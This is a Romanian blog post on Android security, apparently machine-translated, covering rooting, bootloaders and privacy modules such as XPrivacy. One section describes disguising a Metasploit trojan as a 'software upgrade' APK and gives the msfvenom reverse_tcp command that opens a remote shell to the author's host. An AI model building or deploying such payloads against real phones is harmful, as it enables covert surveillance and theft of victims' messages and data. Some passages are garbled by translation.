✅ Android - Ghid complet pentru securitatea Android și Open Source

Introducere în Android

Sursa imaginii: pixabay.com

Introducere în Android

În această subiectă, vom afla despre Android și Open Source Security (OS). Android este o platformă Open Source. Seamănă mult cu Linux, dar este totuși mult prea diferit de Linux. Linux este mult prea matur în comparație cu Android. Așadar, acesta este Chetan Nayak și este binevenit la următorul meu blog despre Open Source Web Security. Am scris acest blog presupunând că majoritatea dintre noi ar folosi Android K, adică Kitkat sau Android L adică Lollipop.

Motivul pentru care sunt Gingerbread și Jellybean au avut o mulțime de probleme de securitate open source despre care nu pot discuta în acest singur blog. Așadar, poate o să discut despre data viitoare când mă voi adânci în versiunile mai vechi de Android. Deci, de acum, să rămânem cu KitKat și Lollipop.

Android a fost proiectat având în vedere dezvoltatorii. Controalele de securitate au fost concepute pentru a reduce povara asupra dezvoltatorilor. Dezvoltatorii experimentați în securitate pot lucra cu ușurință și se pot baza pe controale de securitate flexibile. Dezvoltatorii mai puțin familiarizați cu securitatea vor fi protejați de implicit în condiții de siguranță.

Inceputul

Nu am mai intrat pe Android până în ultimul trimestru al anului 2013, când am avut primul meu telefon mobil Android, care a fost Sony Xperia L (bazat pe 4.2.2 de atunci). Heck, chiar am urât Android motivul fiind că a fost extrem de întârziat, în special dispozitivele Samsung. Chiar am avut în vedere să cumpăr un Windows Lumia atunci, dar, din fericire, am jucat o mulțime de jocuri și a trebuit să cumpăr Xperia L, deoarece această celulă era Lag Proof. Avea aproximativ 1 gig de memorie RAM și Adreno 305. Destul de mișto pentru a rula orice.

După ce am jucat multe jocuri precum NOVA3 și ModernCombat4, m-am plictisit de celula respectivă într-o lună. Știam că Android se bazează pe Linux și voiam să fac unele dintre modificările mele în acest sens. Am început să citesc despre personalizări și am aflat despre ceea ce se numea „Înrădăcinare”. Deoarece am avut un backhand bun în Linux, înrădăcinarea nu a fost o problemă pentru mine. Cu un pic de ajutor din partea XDA, am reușit să-mi înrădăcesc cu succes celula.

Dar atunci m-a izbit ceva. Imediat ce celula mea a fost repornită după rădăcină, aceasta a început doar să pornească la pornire (blocată pe ecranul de pornire pentru totdeauna). Nici nu știam ce este bootloader-ul în Android. Deci, nu puteam face nimic. A fost doar o lună din care mi-am cumpărat noua celulă, iar celula mea era acum moale. Am citit întotdeauna că înrădăcinarea este periculoasă, dar nu știam că mi-ar cărămula celula. Dar m-am înșelat. Pe măsură ce am continuat să citesc unul și altul despre chestiuni de rooting, am știut că rootarea nu vă face cărămizile pe telefon.

Înrădăcinarea este la fel de asemănătoare cu și Accesul de administrator într-un computer (de fapt, este un Acces la sistem, dar am scris Admin Access, deci este ușor de înțeles pentru noobs.). Aceasta înseamnă că înrădăcinarea nu vă va cărămisi telefonul. A fost încărcătorul care mi-a atras telefonul. Pentru persoanele care nu știu că bootloader este; bootloader este similar cu BIOS-ul din Windows. (Dacă nu știți ce este BIOS-ul, atunci nici nu ar trebui să citiți gândindu-vă la securitate în primul rând.) Bootloader sau Hboot (așa se numește în Android) este primul lucru care se execută atunci când porniți Android-ul. dispozitiv.

Acesta conține instrucțiunile de pornire a kernel-ului sistemului de operare și majoritatea sunt proiectate special pentru a rula propriul mediu de depanare sau modificare.

Security CheckPoint din Android

Gândiți-vă la bootloader ca la punctul de control al securității dispozitivului. Dacă spargeți acest punct de control, atunci veți pierde tot ceea ce aveți pe telefon. Deci, este o caracteristică bună de securitate, spun eu. Deoarece dacă vă pierdeți telefonul și cineva încearcă să obțină acces root pentru a ocoli blocarea (presupunând că ați blocat dispozitivul cu un pin sau o parolă.), Atunci va trebui să deblocheze obligatoriu bootloader-ul, ceea ce va duce la ștergerea datelor dvs. la telefon.

Așadar, nu trebuie să vă faceți griji pentru că cineva îl utilizează greșit. Deci, similar este cazul ROM-urilor personalizate. ROM-urile sunt sisteme de operare bazate pe versiuni Android concepute special pentru arhitectura hardware-ului. Așadar, dacă verificați XDA, pentru telefonul dvs., veți avea un număr de ROM-uri personalizate pentru telefoanele dvs., unele dintre cele mai cunoscute fiind ROM-urile Cyanogen Mod, care sunt deja preînrădăcinate și vin cu un set predefinit de personalizări. .

Securitate OverRide de Android

S-ar putea să vă gândiți că aveți un telefon mobil sigur. Dar sunt aici să vă dovedesc greșit din nou și acesta este întregul punct al acestui blog. Până în al doilea trimestru al anului 2014, oamenii începuseră deja să dezvolte exploit-uri și rootkit-uri pentru Android, care îți puteau rădăcina telefoanele celulare fără să deblochezi niciodată bootloaders-ul.

Nu este suficient de înfricoșător? Permiteți-mi să vă spun cea mai periculoasă parte. Ar putea chiar să instaleze troieni în asta. Așadar, chiar dacă polițiștii ar putea să urmărească celula și chiar să-ți recuperezi celula, există încă un risc ridicat ca aceștia să vadă tot ceea ce faci pe telefon. Acest lucru am încercat ca experiment într-un mediu practic real.

Am folosit Metasploit pentru acest atac. Ce am făcut a fost să creez un troian și l-am instalat în telefonul țintă. Era un fișier apk simplu și l-am numit un upgrade software. Așadar, dacă utilizatorul este doar un om obișnuit, care are doar informații despre bit și byte despre securitate, atunci nici nu va îndrăzni să îl elimine. Și m-am asigurat că, de fiecare dată când este activat internetul, malware-ul creat de mine se va executa automat și se va conecta înapoi la portul meu de la distanță de pe mașina gazdă.

Următoarele comenzi au fost utilizate pentru atac (Metasploit este un software de testare a penetrării care ajută la verificarea vulnerabilităților pe o platformă sau dispozitive specifice.)

Adresa IP a gazdei mele: 192.168.xx.xx

Portul meu gazdă (pentru a vă conecta înapoi la): 445

>>>msfvenom

>>> msfvenom android / meterpreter / reverse_tcp LHOST = 192.168.xx.xx LPORT = 445> SoftwareUpgrade.apk

Așadar, aici am creat un canal TCP invers pe computer. Așadar, de fiecare dată când internetul pornește pe Android, voi primi un shell deschis pe mașina mea Kali sau pe mașina în care am instalat Metasploit.

Deci, acum știți cât de înfricoșător este pentru o persoană pe care nici măcar nu o cunoașteți, are înregistrări ale fiecărei tranzacții pe care le faceți prin intermediul celulei dvs., a fiecărui alt contact, a mesajelor WhatsApp, a SMS-urilor, a Viber-ului și a tuturor apelurilor. Dacă nu este înfricoșător, nu știu ce este.

Cursuri recomandate

Curs de certificare în depanare Ruby
Curs complet PHP MySQL
Curs de certificare online în programare VB.NET
Curs online pe fundația ITIL

Acoperirea

Destul despre problemele de securitate. Știm cu toții că fiecare altă platformă are probleme de securitate. Cum am putea fi siguri atunci? Acest lucru nu este chiar adevărat. Platformele pot fi securizate până la un anumit punct, dar după aceea, trebuie să ne asigurăm că rămâne așa. Există un citat infam în lumea Securității:

„Inginerie socială: pentru că nu există nici un petic pentru stupiditatea umană”

Am auzit această frază cu mult timp în urmă, când mă uitam la o conferință a DefCon.

Când nu există nici o vulnerabilitate tehnică de exploatat, ar trebui să încercați să hack hackeri. Și, prin asta, nu mă refer la hipnotism și chestii. Mă refer la Inginerie socială. Puteți citi celălalt blog al meu „Importanța securității cibernetice în viața noastră de zi cu zi” pentru mai multe informații despre acest lucru.

Funcția principală de securitate a Android

În plus, inginerie socială, care este ceva care poate fi îngrijit doar dacă sunteți inteligent; există modalități de a dezvolta aplicații Android într-un mod sigur, pentru a vă asigura că rămâne așa.

Iată câteva dintre principalele caracteristici de securitate care te ajută să creezi aplicații sigure:

Aplicația Android Sandbox, care izolează datele aplicației și execuția codului de alte aplicații.

Un cadru de aplicații cu implementări robuste ale funcționalității comune de securitate, cum ar fi criptografie, permisiuni și IPC securizat.

Un sistem de fișiere criptat care poate fi activat pentru a proteja datele de pe dispozitive pierdute sau furate.

Permisii acordate de utilizator pentru a restricționa accesul la caracteristicile sistemului și la datele utilizatorului.

Permisiunile definite de aplicație pentru a controla datele aplicației în fiecare aplicație.

Ce puteți face dacă doriți un mediu securizat, dar nu sunteți dezvoltator?

În ceea ce privește Android 5, adică Lollipop, oferă o caracteristică în care utilizatorul poate adăuga mai multe profiluri și moduri restricționate pentru a utiliza telefoane și tablete. În plus, dacă ați înrădăcinat telefonul, există aplicații Android în module Xposed, cum ar fi AppOps, Xprivacy sau Privacy Guard, care vă pot ajuta să aveți grijă de aproape orice. Trebuie să instalați Xposed Framework pentru asta.

Xposed Framework este ceea ce permite funcționarea modulelor Xposed. Modulele Xposed vă permit să schimbați comportamentul fișierelor APK și a fișierelor de sistem, fără a fi necesară instalarea unui alt ROM. Este, de asemenea, ușor să anulați modificările, astfel încât există puțin riscuri aici și nici măcar nu consumă timp, deoarece nu este nevoie să clipești mai multe ROM-uri, kerneluri și remedierea erorilor.

Xprivacy, Privacy Guard și AppOps sunt module expuse care vă permit să asigurați Android-ul dvs. în siguranță, alegând ce aplicație ar trebui să aibă acces la cum ar fi internetul, tastatura, cardul SD, accesul root și multe alte lucruri. Puteți chiar dezactiva accesul numai la anumite servicii și puteți crea șabloane definite de utilizator pentru asta. Cât despre mine, prefer să aleg Xprivacy. Dar iată câteva informații sau diferențe dacă rogi să diferiți pentru a alege între cele trei de mai sus.

AppOps:

Aceasta a fost inițial introdusă de Google în Android 4.3. (Acesta este principalul motiv pentru care nu îl accept. Nu am încredere în Google. Numiți-l Paranoia, dar Google urmărește tot ceea ce faceți. Și nu am nevoie de cineva care să țină o evidență a tot ceea ce fac, dar dacă aveți încredere în Google, Du-te.). Principala limitare a AppOps este că Google vă permite doar să blocați accesul la acele aplicații pe care dorește să le blocați.

Asta înseamnă că doriți să blocați aplicații legate de Google, cum ar fi Play Services (care consumă de fapt peste 50% din memoria normală, baterie și date (internet)) nu veți putea. Acesta este încă un motiv pentru mine să urăsc Google. Deci, cred că AppOps nu este decât un malware pentru mine. (dar asta doar eu mă gândesc în acest fel, nu este dacă aveți încredere exclusiv pe Google)

Garda de confidențialitate:

Privacy Guard este o interfață simplă de utilizat realizată înlocuirea AppOps de Cyanogen Mod. Dacă sunteți începători, vă sugerez să utilizați acest lucru, deoarece are doar un buton de declanșare și șabloane auto-definite cu privire la ce tip de aplicație ar trebui să aibă acces la ce. Acest lucru nu este atât de sigur dacă există un malware care acționează sau preia funcția ca o aplicație de sistem. Dar este bine să te apuci.

Xprivacy:

Xprivacy este un instrument All in one. Dar este destinată experților. Îl poți compara cu un cuțit elvețian al armatei. Are totul în el și vă poate asigura telefonul în siguranță în orice alt mod, dar dacă nu știți ce faceți, vă va încurca telefonul și va opri aplicațiile chiar de la început. De asemenea, puteți restricționa accesul la aplicațiile de sistem. Acesta este ceea ce prefer eu personal să aleg.

În afară de modulele de mai sus, există chiar și alte module, cum ar fi Lightening Firewall sau BootManager în Xposed, care pot ajuta la restricționarea accesului la internet pentru aplicații specifice și oprirea aplicațiilor de la pornirea alături de sistem atunci când reporniți un telefon.

Deci, asta ar fi pentru acest blog. În caz de probleme de securitate, puteți vizita cu siguranță sau să fiți membru al site-ului XDA, care vă poate oferi multe informații despre confidențialitate.

Articole recomandate: -

Acesta a fost un ghid pentru Android. Aici am discutat Conceptul de bază, punctele de control de securitate și Funcția de securitate de bază pentru Android. Puteți parcurge și alte articole sugerate pentru a afla mai multe -

Întrebări cu interviuri Android - Top 10 Întrebări utile
8 alternative utile Siri pentru Android
28 Cele mai bune sfaturi și trucuri pentru instrumente de dezvoltare a aplicațiilor Android
Cariere în dezvoltarea Android

Categorie:

Dezvoltare de software

Android - Ghid complet pentru securitatea Android și Open Source

Introducere în Android

Inceputul

Security CheckPoint din Android

Securitate OverRide de Android

Acoperirea

Funcția principală de securitate a Android

Ce puteți face dacă doriți un mediu securizat, dar nu sunteți dezvoltator?

AppOps:

Garda de confidențialitate:

Xprivacy:

Cunoașterea interfeței Photoshop

Photoshop Tabbed Documente și plutitoare Windows

Cum să faceți selecții în Photoshop

Cum să închideți imaginile în Photoshop

Agile vs Cascada - Top 10 comparații pe care ar trebui să le știi

Agile vs Scrum - Top 14 cele mai bune diferențe pe care ar trebui să le cunoști

Un bun lider - Cele mai bune calități pentru a deveni un bun lider

Flux de lucru agil - Cicluri de viață diferite și tipuri de modele de flux de lucru agile

Maya vs ZBrush - 11 Cele mai minunate diferențe pe care ar trebui să le știi

Algoritmul schimbărilor medii - Clustering și implementare

Ghid uimitor pentru a învăța arta proiectelor de mecatronică

Mentor vs Antrenor - Există o diferență? - edu CBA

Introducere în Android

Inceputul

Security CheckPoint din Android

Securitate OverRide de Android

Acoperirea

Funcția principală de securitate a Android

Ce puteți face dacă doriți un mediu securizat, dar nu sunteți dezvoltator?

AppOps:

Garda de confidențialitate:

Xprivacy:

Citeşte Mai Mult